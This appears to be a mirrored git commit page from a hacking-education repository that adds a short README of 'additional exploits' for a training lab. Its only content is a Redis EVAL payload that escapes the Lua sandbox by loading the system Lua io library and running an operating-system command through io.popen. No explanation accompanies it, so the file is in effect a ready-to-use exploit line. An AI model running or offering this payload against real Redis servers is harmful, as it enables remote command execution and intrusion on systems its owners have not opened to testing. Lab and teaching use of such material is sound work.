mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-18 10:56:09 +00:00
Merge pull request #172 from The-Art-of-Hacking/santosomar-patch-9
Create README.md
This commit is contained in:
commit
40c5f6ea77
7
web_application_testing/additional_exploits/README.md
Normal file
7
web_application_testing/additional_exploits/README.md
Normal file
@ -0,0 +1,7 @@
|
||||
# Additional Exploits Used in WebSploit Labs
|
||||
|
||||
## DEC31_01
|
||||
|
||||
```
|
||||
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
|
||||
```
|
Loading…
Reference in New Issue
Block a user